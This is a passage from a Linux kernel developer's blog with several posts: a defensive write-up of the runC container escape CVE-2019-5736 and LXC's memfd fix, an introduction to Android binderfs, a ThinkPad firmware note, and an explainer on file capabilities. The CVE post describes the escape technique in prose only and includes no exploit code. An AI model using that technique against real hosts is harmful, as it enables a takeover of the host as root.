Canonical Voices

What brauner's blog talks about

Christian Brauner

Runtimes And the Curse of the Privileged Container

Introduction (CVE-2019-5736)

Today, Monday, 2019-02-11, 14:00:00 CET CVE-2019-5736 was released:

The vulnerability allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command (it doesn’t matter if the command is not attacker-controlled) as root within a container in either of these contexts:

  • Creating a new container using an attacker-controlled image.
  • Attaching (docker exec) into an existing container which the attacker had previous write access to.

I’ve been working on a fix for this issue over the last couple of weeks together with Aleksa a friend of mine and maintainer of runC. When he notified me about the issue in runC we tried to come up with an exploit for LXC as well and though harder it is doable. I was interested in the issue for technical reasons and figuring out how to reliably fix it was quite fun (with a proper dose of pure hatred). It also caused me to finally write down some personal thoughts I had for a long time about how we are running containers.

What are Privileged Containers?

At a first glance this is a question that is probably trivial to anyone who has a decent low-level understanding of containers. Maybe even most users by now will know what a privileged container is. A first pass at defining it would be to say that a privileged container is a container that is owned by root. Looking closer this seems an insufficient definition. What about containers using user namespaces that are started as root? It seems we need to distinguish between what ids a container is running with. So we could say a privileged container is a container that is running as root. However, this is still wrong. Because “running as root” can either be seen as meaning “running as root as seen from the outside” or “running as root from the inside” where “outside” means “as seen from a task outside the container” and “inside” means “as seen from a task inside the container”.

What we really mean by a privileged container is a container where the semantics for id 0 are the same inside and outside of the container ceteris paribus. I say “ceteris paribus” because using LSMs, seccomp or any other security mechanism will not cause a change in the meaning of id 0 inside and outside the container. For example, a breakout caused by a bug in the runtime implementation will give you root access on the host.

An unprivileged container then simply is any container in which the semantics for id 0 inside the container are different from id 0 outside the container. For example, a breakout caused by a bug in the runtime implementation will not give you root access on the host by default. This should only be possible if the kernel’s user namespace implementation has a bug.

The reason why I like to define privileged containers this way is that it also lets us handle edge cases. Specifically, the case where a container is using a user namespace but a hole is punched into the idmapping at id 0 aka where id 0 is mapped through. Consider a container that uses the following idmappings:

id: 0 100000 100000

This instructs the kernel to setup the following mapping:

id: container_id(0) -> host_id(100000)
id: container_id(1) -> host_id(100001)
id: container_id(2) -> host_id(100002)
.
.
.

container_id(100000) -> host_id(200000)

With this mapping it’s evident that container_id(0) != host_id(0). But now consider the following mapping:

id: 0 0 1
id: 1 100001 99999

This instructs the kernel to setup the following mapping:

id: container_id(0) -> host_id(0)
id: container_id(1) -> host_id(100001)
id: container_id(2) -> host_id(100002)
.
.
.

container_id(99999) -> host_id(199999)

In contrast to the first example this has the consequence that container_id(0) == host_id(0). I would argue that any container that at least punches a hole for id 0 into its idmapping up to specifying an identity mapping is to be considered a privileged container.

As a sidenote, Docker containers run as privileged containers by default. There is usually some confusion where people think because they do not use the --privileged flag that Docker containers run unprivileged. This is wrong. What the --privileged flag does is to give you even more permissions by e.g. not dropping (specific or even any) capabilities. One could say that such containers are almost “super-privileged”.

The Trouble with Privileged Containers

The problem I see with privileged containers is essentially captured by LXC’s and LXD’s upstream security position which we have held since at least 2015 but probably even earlier. I’m quoting from our notes about privileged containers:

Privileged containers are defined as any container where the container uid 0 is mapped to the host’s uid 0. In such containers, protection of the host and prevention of escape is entirely done through Mandatory Access Control (apparmor, selinux), seccomp filters, dropping of capabilities and namespaces.

Those technologies combined will typically prevent any accidental damage of the host, where damage is defined as things like reconfiguring host hardware, reconfiguring the host kernel or accessing the host filesystem.

LXC upstream’s position is that those containers aren’t and cannot be root-safe.

They are still valuable in an environment where you are running trusted workloads or where no untrusted task is running as root in the container.

We are aware of a number of exploits which will let you escape such containers and get full root privileges on the host. Some of those exploits can be trivially blocked and so we do update our different policies once made aware of them. Some others aren’t blockable as they would require blocking so many core features that the average container would become completely unusable.

[…]

As privileged containers are considered unsafe, we typically will not consider new container escape exploits to be security issues worthy of a CVE and quick fix. We will however try to mitigate those issues so that accidental damage to the host is prevented.

LXC’s upstream position for a long time has been that privileged containers are not and cannot be root safe. For something to be considered root safe it should be safe to hand root access to third parties or tasks.

Running Untrusted Workloads in Privileged Containers

is insane. That’s about everything that this paragraph should contain. The fact that the semantics for id 0 inside and outside the container are identical entails that any meaningful container escape will have the attacker gain root on the host.

CVE-2019-5736 Is a Very Very Very Bad Privilege Escalation to Host Root

CVE-2019-5736 is an excellent illustration of such an attack. Think about it: a process running inside a privileged container can rather trivially corrupt the binary that is used to attach to the container. This allows an attacker to create a custom ELF binary on the host. That binary could do anything it wants:

  • could just be a binary that calls poweroff
  • could be a binary that spawns a root shell
  • could be a binary that kills other containers when called again to attach
  • could be suid cat
  • .
  • .
  • .

The attack vector is actually slightly worse for runC due to its architecture. Since runC exits after spawning the container it can also be attacked through a malicious container image. Which is super bad given that a lot of container workload workflows rely on downloading images from the web.

LXC cannot be attacked through a malicious image since the monitor process (a singleton per-container) never exits during the containers life cycle. Since the kernel does not allow modifications to running binaries it is not possible for the attacker to corrupt it. When the container is shutdown or killed the attacking task will be killed before it can do any harm. Only when the last process running inside the container has exited will the monitor itself exit. This has the consequence, that if you run privileged OCI containers via our oci template with LXC your are not vulnerable to malicious images. Only the vector through the attaching binary still applies.

The Lie that Privileged Containers can be safe

Aside from mostly working on the Kernel I’m also a maintainer of LXC and LXD alongside Stéphane Graber. We are responsible for LXC - the low-level container runtime - and LXD - the container management daemon using LXC. We have made a very conscious decision to consider privileged containers not root safe. Two main corollaries follow from this:

  1. Privileged containers should never be used to run untrusted workloads.
  2. Breakouts from privileged containers are not considered CVEs by our security policy. It still seems a common belief that if we all just try hard enough using privileged containers for untrusted workloads is safe. This is not a promise that can be made good upon. A privileged container is not a security boundary. The reason for this is simply what we looked at above: container_id(0) == host_id(0). It is therefore deeply troubling that this industry is happy to let users believe that they are safe and secure using privileged containers.

Unprivileged Containers as Default

As upstream for LXC and LXD we have been advocating the use of unprivileged containers by default for years. Way ahead before anyone else did. Our low-level library LXC has supported unprivileged containers since 2013 when user namespaces were merged into the kernel. With LXD we have taken it one step further and made unprivileged containers the default and privileged containers opt-in for that very matter: privileged containers aren’t safe. We even allow you to have per-container idmappings to make sure that not just each container is isolated from the host but also all containers from each other.

For years we have been advocating for unprivileged containers on conferences, in blogposts, and whenever we have spoken to people but somehow this whole industry has chosen to rely on privileged containers.

The good news is that we are seeing changes as people become more familiar with the perils of privileged containers. Let this recent CVE be another reminder that unprivileged containers need to be the default.

Are LXC and LXD affected?

I have seen this question asked all over the place so I guess I should add a section about this too:

  • Unprivileged LXC and LXD containers are not affected.

  • Any privileged LXC and LXD container running on a read-only rootfs is not affected.

  • Privileged LXC containers in the definition provided above are affected. Though the attack is more difficult than for runC. The reason for this is that the lxc-attach binary does not exit before the program in the container has finished executing. This means an attacker would need to open an O_PATH file descriptor to /proc/self/exe, fork() itself into the background and re-open the O_PATH file descriptor through /proc/self/fd/<O_PATH-nr> in a loop as O_WRONLY and keep trying to write to the binary until such time as lxc-attach exits. Before that it will not succeed since the kernel will not allow modification of a running binary.

  • Privileged LXD containers are only affected if the daemon is restarted other than for upgrade reasons. This should basically never happen. The LXD daemon never exits so any write will fail because the kernel does not allow modification of a running binary. If the LXD daemon is restarted because of an upgrade the binary will be swapped out and the file descriptor used for the attack will write to the old in-memory binary and not to the new binary.

Chromebooks with Crostini using LXD are not affected

Chromebooks use LXD as their default container runtime are not affected. First of all, all binaries reside on a read-only filesystem and second, LXD does not allow running privileged containers on Chromebooks through the LXD_UNPRIVILEGED_ONLY flag. For more details see this link.

Fixing CVE-2019-5736

To prevent this attack, LXC has been patched to create a temporary copy of the calling binary itself when it attaches to containers (cf. 6400238d08cdf1ca20d49bafb85f4e224348bf9d). To do this LXC can be instructed to create an anonymous, in-memory file using the memfd_create() system call and to copy itself into the temporary in-memory file, which is then sealed to prevent further modifications. LXC then executes this sealed, in-memory file instead of the original on-disk binary. Any compromising write operations from a privileged container to the host LXC binary will then write to the temporary in-memory binary and not to the host binary on-disk, preserving the integrity of the host LXC binary. Also as the temporary, in-memory LXC binary is sealed, writes to this will also fail. To not break downstream users of the shared library this is opt-in by setting LXC_MEMFD_REXEC in the environment. For our lxc-attach binary which is the only attack vector this is now done by default.

Workloads that place the LXC binaries on a read-only filesystem or prevent running privileged containers can disable this feature by passing --disable-memfd-rexec during the configure stage when compiling LXC.

Read more
Christian Brauner

Android Binderfs

asciicast

Introduction

Android Binder is an inter-process communication (IPC) mechanism. It is heavily used in all Android devices. The binder kernel driver has been present in the upstream Linux kernel for quite a while now.

Binder has been a controversial patchset (see this lwn article as an example). Its design was considered wrong and to violate certain core kernel design principles (e.g. a task should never touch another tasks file descriptor table). Most kernel developers were not a fan of binder.

Recently, the upstream binder code has fortunately been reworked significantly (e.g. it does not touch another tasks file descriptor table anymore, the locking is very fine-grained now, etc.).

With Android being one of the major operating systems (OS) for a vast number of devices there is simply no way around binder.

The Android Service Manager

The binder IPC mechanism is accessible from userspace through device nodes located at /dev. A modern Android system will allocate three device nodes:

  • /dev/binder
  • /dev/hwbinder
  • /dev/vndbinder

serving different purposes. However, the logic is the same for all three of them. A process can call open(2) on those device nodes to receive an fd which it can then use to issue requests via ioctl(2)s. Android has a service manager which is used to translate addresses to bus names and only the address of the service manager itself is well-known. The service manager is registered through an ioctl(2) and there can only be a single service manager. This means once a service manager has grabbed hold of binder devices they cannot be (easily) reused by a second service manager.

Running Android in Containers

This matters as soon as multiple instances of Android are supposed to be run. Since they will all need their own private binder devices. This is a use-case that arises pretty naturally when running Android in system containers. People have been doing this for a long time with LXC. A project that has set out to make running Android in LXC containers very easy is Anbox. Anbox makes it possible to run hundreds of Android containers.

To properly run Android in a container it is necessary that each container has a set of private binder devices.

Statically Allocating binder Devices

Binder devices are currently statically allocated at compile time. Before compiling a kernel the CONFIG_ANDROID_BINDER_DEVICES option needs to bet set in the kernel config (Kconfig) containing the names of the binder devices to allocate at boot. By default it is set as:

CONFIG_ANDROID_BINDER_DEVICES="binder,hwbinder,vndbinder"

To allocate additional binder devices the user needs to specify them with this Kconfig option. This is problematic since users need to know how many containers they will run at maximum and then to calculate the number of devices they need so they can specify them in the Kconfig. When the maximum number of needed binder devices changes after kernel compilation the only way to get additional devices is to recompile the kernel.

Problem 1: Using the misc major Device Number

This situation is aggravated by the fact that binder devices use the misc major number in the kernel. Each device node in the Linux kernel is identified by a major and minor number. A device can request its own major number. If it does it will have an exclusive range of minor numbers it doesn’t share with anything else and is free to hand out. Or it can use the misc major number. The misc major number is shared amongst different devices. However, that also means the number of minor devices that can be handed out is limited by all users of misc major. So if a user requests a very large number of binder devices in their Kconfig they might make it impossible for anyone else to allocate minor numbers. Or there simply might not be enough to allocate for itself.

Problem 2: Containers and IPC namespaces

All of those binder devices requested in the Kconfig via CONFIG_ANDROID_BINDER_DEVICES will be allocated at boot and be placed in the hosts devtmpfs mount usually located at /dev or - depending on the udev(7) implementation - will be created via mknod(2) - by udev(7) at boot. That means all of those devices initially belong to the host IPC namespace. However, containers usually run in their own IPC namespace separate from the host’s. But when binder devices located in /dev are handed to containers (e.g. with a bind-mount) the kernel driver will not know that these devices are now used in a different IPC namespace since the driver is not IPC namespace aware. This is not a serious technical issue but a serious conceptual one. There should be a way to have per-IPC namespace binder devices.

Enter binderfs

To solve both problems we came up with a solution that I presented at the Linux Plumbers Conference in Vancouver this year. There’s a video of that presentation available on Youtube:

Android binderfs is a tiny filesystem that allows users to dynamically allocate binder devices, i.e. it allows to add and remove binder devices at runtime. Which means it solves problem 1. Additionally, binder devices located in a new binderfs instance are independent of binder devices located in another binderfs instance. All binder devices in binderfs instances are also independent of the binder devices allocated during boot specified in CONFIG_ANDROID_BINDER_DEVICES. This means, binderfs solves problem 2.

Android binderfs can be mounted via:

mount -t binder binder /dev/binderfs

at which point a new instance of binderfs will show up at /dev/binderfs. In a fresh instance of binderfs no binder devices will be present. There will only be a binder-control device which serves as the request handler for binderfs:

root@edfu:~# ls -al /dev/binderfs/
total 0
drwxr-xr-x  2 root root      0 Jan 10 15:07 .
drwxr-xr-x 20 root root   4260 Jan 10 15:07 ..
crw-------  1 root root 242, 6 Jan 10 15:07 binder-control

binderfs: Dynamically Allocating a New binder Device

To allocate a new binder device in a binderfs instance a request needs to be sent through the binder-control device node. A request is sent in the form of an ioctl(2). Here’s an example program:

#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include <linux/android/binder.h>
#include <linux/android/binderfs.h>

int main(int argc, char *argv[])
{
        int fd, ret, saved_errno;
        size_t len;
        struct binderfs_device device = { 0 };

        if (argc != 3)
                exit(EXIT_FAILURE);

        len = strlen(argv[2]);
        if (len > BINDERFS_MAX_NAME)
                exit(EXIT_FAILURE);

        memcpy(device.name, argv[2], len);

        fd = open(argv[1], O_RDONLY | O_CLOEXEC);
        if (fd < 0) {
                printf("%s - Failed to open binder-control device\n",
                       strerror(errno));
                exit(EXIT_FAILURE);
        }

        ret = ioctl(fd, BINDER_CTL_ADD, &device);
        saved_errno = errno;
        close(fd);
        errno = saved_errno;
        if (ret < 0) {
                printf("%s - Failed to allocate new binder device\n",
                       strerror(errno));
                exit(EXIT_FAILURE);
        }

        printf("Allocated new binder device with major %d, minor %d, and "
               "name %s\n", device.major, device.minor,
               device.name);

        exit(EXIT_SUCCESS);
}

What this program simply does is to open the binder-control device node and sending a BINDER_CTL_ADD request to the kernel. Users of binderfs need to tell the kernel which name the new binder device should get. By default a name can only contain up to 256 chars including the terminating zero byte. The struct which is used is:

/**
 * struct binderfs_device - retrieve information about a new binder device
 * @name:   the name to use for the new binderfs binder device
 * @major:  major number allocated for binderfs binder devices
 * @minor:  minor number allocated for the new binderfs binder device
 *
 */
struct binderfs_device {
       char name[BINDERFS_MAX_NAME + 1];
       __u32 major;
       __u32 minor;
};

and is defined in linux/android/binderfs.h. Once the request is made via an ioctl(2) passing a struct binder_device with the name to the kernel it will allocate a new binder device and return the major and minor number of the new device in the struct (This is necessary because binderfs allocated a major device number dynamically at boot.). After the ioctl(2) returns there will be a new binder device located under /dev/binderfs with the chosen name:

root@edfu:~# ls -al /dev/binderfs/
total 0
drwxr-xr-x  2 root root      0 Jan 10 15:19 .
drwxr-xr-x 20 root root   4260 Jan 10 15:07 ..
crw-------  1 root root 242, 0 Jan 10 15:19 binder-control
crw-------  1 root root 242, 1 Jan 10 15:19 my-binder
crw-------  1 root root 242, 2 Jan 10 15:19 my-binder1

binderfs: Deleting a binder Device

Deleting binder devices does not involve issuing another ioctl(2) request through binder-control. They can be deleted via unlink(2). This means that the rm(1) tool can be used to delete them:

root@edfu:~# rm /dev/binderfs/my-binder1
root@edfu:~# ls -al /dev/binderfs/
total 0
drwxr-xr-x  2 root root      0 Jan 10 15:19 .
drwxr-xr-x 20 root root   4260 Jan 10 15:07 ..
crw-------  1 root root 242, 0 Jan 10 15:19 binder-control
crw-------  1 root root 242, 1 Jan 10 15:19 my-binder

Note that the binder-control device cannot be deleted since this would make the binderfs instance unuseable. The binder-control device will be deleted when the binderfs instance is unmounted and all references to it have been dropped.

binderfs: Mounting Multiple Instances

Mounting another binderfs instance at a different location will create a new and separate instance from all other binderfs mounts. This is identical to the behavior of devpts, tmpfs, and also - even though never merged in the kernel - kdbusfs:

root@edfu:~# mkdir binderfs1
root@edfu:~# mount -t binder binder binderfs1
root@edfu:~# ls -al binderfs1/
total 4
drwxr-xr-x  2 root   root        0 Jan 10 15:23 .
drwxr-xr-x 72 ubuntu ubuntu   4096 Jan 10 15:23 ..
crw-------  1 root   root   242, 2 Jan 10 15:23 binder-control

There is no my-binder device in this new binderfs instance since its devices are not related to those in the binderfs instance at /dev/binderfs. This means users can easily get their private set of binder devices.

binderfs: Mounting binderfs in User Namespaces

The Android binderfs filesystem can be mounted and used to allocate new binder devices in user namespaces. This has the advantage that binderfs can be used in unprivileged containers or any user-namespace-based sandboxing solution:

ubuntu@edfu:~$ unshare --user --map-root --mount
root@edfu:~# mkdir binderfs-userns
root@edfu:~# mount -t binder binder binderfs-userns/
root@edfu:~# The "bfs" binary used here is the compiled program from above
root@edfu:~# ./bfs binderfs-userns/binder-control my-user-binder
Allocated new binder device with major 242, minor 4, and name my-user-binder
root@edfu:~# ls -al binderfs-userns/
total 4
drwxr-xr-x  2 root root      0 Jan 10 15:34 .
drwxr-xr-x 73 root root   4096 Jan 10 15:32 ..
crw-------  1 root root 242, 3 Jan 10 15:34 binder-control
crw-------  1 root root 242, 4 Jan 10 15:36 my-user-binder

Kernel Patchsets

The binderfs patchset is merged upstream and will be available when Linux 5.0 gets released. There are a few outstanding patches that are currently waiting in Greg’s tree (cf. binderfs: remove wrong kern_mount() call and binderfs: make each binderfs mount a new instancechar-misc-linus) and some others are queued for the 5.1 merge window. But overall it seems to be in decent shape.

Read more
Christian Brauner

Today a new firmware update enabled the long-missing S3 support for 6en Lenovo ThinkPad X1. After getting the new update via:

sudo fwupdmgr refresh
sudo fwupdmgr get-updates

You should see:

20KHCTO1WW System Firmware has firmware updates:
GUID:                    a4b51dca-8f97-4310-8821-3330f83c9135
GUID:                    230c8b18-8d9b-53ec-838b-6cfc0383493a
ID:                      com.lenovo.ThinkPadN23ET.firmware
Update Version:          0.1.30
Update Name:             ThinkPad X1 Carbon 6th
Update Summary:          Lenovo ThinkPad X1 Carbon 6th System Firmware
Update Remote ID:        lvfs
Update Checksum:         SHA1(1a528d1b227e500bcaedbd4c7026a477c5f4a5ca)
Update Location:         https://fwupd.org/downloads/7bd315afb8ff3a610474b752265e7703e6bf1d5e-Lenovo-ThinkPad-X1Carbon6th-SystemFirmware-1.30.cab
Update Description:      Lenovo ThinkPad X1 Carbon 6th System Firmware
                         
                         CHANGES IN THIS RELEASE
                         
                         Version 1.30
                         
                         [Important updates]
                          • Nothing.
                         
                         [New functions or enhancements]
                          • Support Optimized Sleep State for Linux in ThinkPad Setup - Config - Power.
                          • (Note) "Linux"option is optimized for Linux OS, Windows user must select
                          • "Windows 10" option
                         
                         [Problem fixes]
                          • Nothing.

After installing the update via:

sudo fwupdmgr update

S3 will still not be enabled. To enable it fully you must enter the BIOS on boot and change:

alt text

to

alt text

Then

dmesg | grep S3

should show

[    0.236226] ACPI: (supports S0 S3 S4 S5)

Christian

Read more
Christian Brauner

Unprivileged File Capabilities

alt text

Introduction

File capabilities (fcaps) are capabilities associated with - well - files, usually a binary. They can be used to temporarily elevate privileges for unprivileged users in order to accomplish a privileged task. This allows various tools to drop the dangerous setuid (suid) or setgid (sgid) bits in favor of fcaps.

While fcaps are supported since Linux 2.6.24 they could only be set in the initial user namespace. If they would have been allowed to be set by root in a non-initial user namespace then any unprivileged user on the host would have been able to map their own uid to root in a new user namespace, set fcaps that would grant more privileges to them, and then execute the binary with elevated privileged on the host. This also means that until recently it was not safe to use fcaps in unprivileged containers, i.e. containers using user namespaces. The good news is that starting with Linux kernel version 4.14 it is possible to set fcaps in user namespaces.

Kernel Patchset

The patchset to enable this has been contributed by Serge Hallyn, a co-maintainer and core developer of the LXD and LXC projects:

commit 8db6c34f1dbc8e06aa016a9b829b06902c3e1340
Author: Serge E. Hallyn <serge@hallyn.com>
Date:   Mon May 8 13:11:56 2017 -0500

    Introduce v3 namespaced file capabilities

LXD Now Preserves File Capabilities In User Namespaces

In parallel to the kernel patchset we have now enabled LXD to preserve fcaps in user namespaces. This means if your kernel supports namespaced fcaps LXD will preserve them whenever unprivileged containers are created, or when their idmapping is changed. No matter if you go from privileged to unpriviliged or the other way around. Your filesystem capabilities will be right there with you. In other news, there is now little to no use for the suid and sgid bits even in unprivileged containers.

This is something that the Linux Containers Project has wanted for a long time and we are happy that we are the first runtime to fully support this feature.

If all of the above either makes no sense to you or you’re asking yourself what is so great about this because some distros have been using fcaps for a long time don’t worry we’ll try to shed some light on all of this.

The dark ages: suid and sgid binaries

Not too long ago the suid and sgid bits were the only well-known mechanism to temporarily grant elevated privileges to unprivileged users executing a binary. Once some or all of the following binaries where suid or sgid binaries on most distros:

  • ping
  • newgidmap
  • newuidmap
  • mtr-packet

The binary that most developers will have already used is the ping binary. It’s convenient to just check whether a connection to the internet has been established successfully by pinging a random website. It’s such a common tool that most people don’t even think about it needing any sort of privilege. In fact it does require privileges. ping wants to open sockets of type SOCK_RAW but the kernel prevents unprivileged users from using sockets of type SOCK_RAW because it would allow them to e.g. send ICMP packages directly. But ping seems like a binary that is useful to unprivileged users as well as safe. Short of a better mechanism the most obvious choice is to have it be owned by uid 0 and set the suid bit.

chb@conventiont|~
> perms /bin/ping
-rwsr-xr-x 4755 /bin/ping

You can see the little s in the permissions. This indicates that this version of ping has the suid bit set. Hence, if called it will run as uid 0 independent of the uid of the caller. In short, if my user has uid 1000 and calls the ping binary ping will still run with uid 0.

While the suid mechanism gets the job done it is also wildly inappropriate. ping does need elevated privileges in one specific area. But by setting the suid bit and having ping be owned by uid 0 we’re granting it all kinds of privileges, in fact all privileges. If there ever is a major security sensitive bug in a suid binary it is trivial for anyone to exploit the fact that it runs as uid 0.

Of course, the kernel has all kinds of security mechanisms to deflate the impact of the suid and sgid bits. If you strace an suid binary the suid bit will be stripped, there are complex rules regarding execve()ing a binary that has the suid bit set, and the suid bit is also dropped when the owner of the binary in question changes, i.e. when you call chown() on it. Still these are all migitations for something that is inherently dangerous because it grants too much for too little gain. It’s like someone asking for a little sugar and you handing out the key to your house. To quote Eric:

Frankly being able to raise the priveleges of an existing process is such a dangerous mechanism and so limiting on system design that I wish someone would care, and remove all suid, sgid, and capabilities use from a distro. It is hard to count how many neat new features have been shelved because of the requirement to support suid root executables.

Capabilities and File Capabilities

This is where capabilities come into play 1. Capabilities start from the idea that the root privilege could as well be split into subsets of privileges. Whenever something requests to perform an operation that requires privileges it doesn’t have we can grant it a very specific subset instead of all privileges at once 2. For example, the ping binary would only need the CAP_NET_RAW capability because it is the capability that regulates whether a process can open SOCK_RAW sockets.

Capabilities are associated with processes and files. Granted, Linux capabilities are not the cleanest or easiest concept to grasp. But I’ll try to shed some light. In essence, capabilities can be present in four different types of sets. The kernel performs checks against a process by looking at its effective capability set, i.e. the capabilities the process has at the time of trying to perform the operation. The rest of the capability sets are (glossing over details now for the sake of brevity) basically used for calculating each other including the effective capability set. There are permitted capabilities, i.e. the capabilities a process is allowed to raise in the effective set, inheritable capabilities, i.e. capabilities that should be (but are only under certain restricted conditions) preserved across an execve(), and ambient capabilities that are there to fix the shortcomings of inheritable capabilities, i.e. they are there to allow unprivileged processes to preserve capabilities across an execve() call. 3 Last but not least we have file capabilities, i.e. capabilities that are attached to a file. When such a file is execve()ed the associated fcaps are taken into account when calculating the permissions after the execve().

Extended attributes and File Capabilities

The part most users are confused about is how capabilities get associated with files. This is where extended attributes (xattr) come into play. xattrs are <key>:<value> pairs that can be associated with files. They are stored on-disk as part of the metadata of a file. The <key> of an xattr will always be a string identifying the attribute in question whereas the <value> can be arbitrary data, i.e. it can be another string or binary data. Note that it is not guaranteed nor required by the kernel that a filesystem supports xattrs. While the virtual filesystem (vfs) will handle all core permission checks, i.e. it will verify that the caller is allowed to set the requested xattr but the actual operation of writing out the xattr on disk will be left to the filesystem. Without going into the specifics the callchain currently is:

SYSCALL_DEFINE5(setxattr, const char __user *, pathname,
                const char __user *, name, const void __user *, value,
                size_t, size, int, flags)
|
-> static int path_setxattr(const char __user *pathname,
                            const char __user *name, const void __user *value,
                            size_t size, int flags, unsigned int lookup_flags)
   |
   -> static long setxattr(struct dentry *d, const char __user *name,
                           const void __user *value, size_t size, int flags)
      |
      -> int vfs_setxattr(struct dentry *dentry, const char *name,
                          const void *value, size_t size, int flags)
         |
         -> int __vfs_setxattr_noperm(struct dentry *dentry, const char *name,
                                      const void *value, size_t size, int flags)

and finally __vfs_setxattr_noperm() will call

int __vfs_setxattr(struct dentry *dentry, struct inode *inode, const char *name,
                   const void *value, size_t size, int flags)
{
        const struct xattr_handler *handler;

        handler = xattr_resolve_name(inode, &name);
        if (IS_ERR(handler))
                return PTR_ERR(handler);
        if (!handler->set)
                return -EOPNOTSUPP;
        if (size == 0)
                value = "";  /* empty EA, do not remove */
        return handler->set(handler, dentry, inode, name, value, size, flags);
}

The __vfs_setxattr() function will then call xattr_resolve_name() which will find and return the appropriate handler for the xattr in the list struct xattr_handler of the corresponding filesystem. If the filesystem has a handler for the xattr in question it will return it and the attribute will be set and if not EOPNOTSUPP will be surfaced to the caller.

For this article we will only focus on the permission checks that the vfs performs not on the filesystem specifics. An important thing to note is that different xattrs are subject to different permission checks by the vfs. First, the vfs regulates what types of xattrs are supported in the first place. If you look at the xattr.h header you will find all supported xattr namespaces. An xattr namespace is essentially nothing but a prefix like security.. Let’s look at a few examples from the xattr.h header:

#define XATTR_SECURITY_PREFIX "security."
#define XATTR_SECURITY_PREFIX_LEN (sizeof(XATTR_SECURITY_PREFIX) - 1)

#define XATTR_SYSTEM_PREFIX "system."
#define XATTR_SYSTEM_PREFIX_LEN (sizeof(XATTR_SYSTEM_PREFIX) - 1)

#define XATTR_TRUSTED_PREFIX "trusted."
#define XATTR_TRUSTED_PREFIX_LEN (sizeof(XATTR_TRUSTED_PREFIX) - 1)

#define XATTR_USER_PREFIX "user."
#define XATTR_USER_PREFIX_LEN (sizeof(XATTR_USER_PREFIX) - 1)

Based on the detected prefix the vfs will decide what permission checks to perform. For example, the user. namespace is not subject to very strict permission checks since it exists to allow users to store arbitrary information. However, some xattrs are subject to very strict permission checks since they allow to change privileges. For example, this affects the security. namespace. In fact, the xattr.h header even exposes a specific capability suffix to use with the security. namespace:

#define XATTR_CAPS_SUFFIX "capability"
#define XATTR_NAME_CAPS XATTR_SECURITY_PREFIX XATTR_CAPS_SUFFIX

As you might have figured out file capabilities are associated with the security.capability xattr.

In contrast to other xattrs the value associated with the security.capability xattr key is not a string but binary data. The actual implementation is a C struct that contains bitmasks of capability flags. To actually set file capabilities userspace would usually use the libcap library because the low-level bits of the implementation are not very easy to use. Let’s say a user wanted to associate the CAP_NET_RAW capability with the ping binary on a system that only supports non-namespaced file capabilities. Then this is the minimum that you would need to do in order to set CAP_NET_RAW in the effective and permitted set of the file:

/*
 * Do not simply copy this code. For the sake of brevity I e.g. omitted
 * handling the necessary endianess translation. (Not to speak of the apparent
 * ugliness and missing documentation of my sloppy macros.)
 */

struct vfs_cap_data xattr = {0};

#define raise_cap_permitted(x, cap_data)   cap_data.data[(x)>>5].permitted   |= (1<<((x)&31))
#define raise_cap_inheritable(x, cap_data) cap_data.data[(x)>>5].inheritable |= (1<<((x)&31))

raise_cap_permitted(CAP_NET_RAW, xattr);
xattr.magic_etc = VFS_CAP_REVISION_2 | VFS_CAP_FLAGS_EFFECTIVE;

setxattr("/bin/ping", "security.capability", &xattr, sizeof(xattr), 0);

After having done this we can look at the ping binary and use the getcap binary to check whether we successfully set the CAP_NET_RAW capability on the ping binary. Here’s a little demo:

asciicast

Setting Unprivileged File Capabilities

On kernels that support namespaced file capabilities the straightforward way to set a file capability is to attach to the user namespace in question as root and then simply perform the above operations. The kernel will then transparently handle the translation between a non-namespaced and a namespaced capability by recording the rootid from the kernel’s perspective (the kuid).

However, it is also possible to set file capabilities in lieu of another user namespace. In order to do this the code above needs to be changed slightly:

/* 
 * Do not simply copy this code. For the sake of brevity I e.g. omitted
 * handling the necessary endianess translation. (Not to speak of the apparent
 * ugliness and missing documentation of my sloppy macros.)
 */

struct vfs_ns_cap_data ns_xattr = {0};

#define raise_cap_permitted(x, cap_data)   cap_data.data[(x)>>5].permitted   |= (1<<((x)&31))
#define raise_cap_inheritable(x, cap_data) cap_data.data[(x)>>5].inheritable |= (1<<((x)&31))

raise_cap_permitted(CAP_NET_RAW, ns_xattr);
ns_xattr.magic_etc = VFS_CAP_REVISION_3 | VFS_CAP_FLAGS_EFFECTIVE;
ns_xattr.rootid = 1000000;

setxattr("/bin/ping", "security.capability", &ns_xattr, sizeof(ns_xattr), 0);

As you can see the struct we use has changed. Instead of using struct vfs_cap_data we are now using struct vfs_ns_cap_data which has gained an additional field rootid. In our example we are setting the rootid to 1000000 which in my example is the rootid of uid 0 in the container’s user namespace as seen from the host. Additionally, we set the magic_etc bit for the fcap version that the vfs is expected to support to VFS_CAP_REVISION_3.

asciicast

As you can see from the asciicast we can’t execute the ping binary as an unprivileged user on the host since the fcaps is namespaced and associated with uid 1000000. But if we copy that binary to a container where this uid is mapped to uid 0 we can now call ping as an unprivileged user.

So let’s look at an actual unprivileged container and let’s set the CAP_NET_RAW capability on the ping binary in there:

asciicast

Some Implementation Details

As you have seen above a new struct vfs_ns_cap_data has been added to the kernel:

/*
 * same as vfs_cap_data but with a rootid at the end
 */
struct vfs_ns_cap_data {
        __le32 magic_etc;
        struct {
                __le32 permitted;    /* Little endian */
                __le32 inheritable;  /* Little endian */
        } data[VFS_CAP_U32];
        __le32 rootid;
};

In the end this struct is what the kernel expects to be passed and which it will use to calculate fcaps. The location of the permitted and inheritable set in struct vfs_ns_cap_data are obvious but the effective set seems to be missing. Whether or not effective caps are set on the file is determined by raising the VFS_CAP_FLAGS_EFFECTIVE bit in the magic_etc mask. The magic_etc member is also used to tell the kernel which fcaps version the vfs is expected to support. The kernel will verify that either XATTR_CAPS_SZ_2 or XATTR_CAPS_SZ_3 are passed as size and are correctly paired with the VFS_CAP_REVISION_2 and VFS_CAP_REVISION_3 flag. If XATTR_CAPS_SZ_2 is set then the kernel will not try to look for a rootid field in the struct it received, i.e. even if you pass a struct vfs_ns_cap_data with a rootid but set XATTR_CAPS_SZ_2 as size parameter and VFS_CAP_REVISION_2 in magic_etc the kernel will be able to ignore the rootid field and instead use the rootid of the current user namespace. This allows the kernel to transparently translate from VFS_CAP_REVISION_2 to VFS_CAP_REVISION_3 fcaps. The main translation mechanism can be found in cap_convert_nscap() and rootid_from_xattr():

/*
* User requested a write of security.capability.  If needed, update the
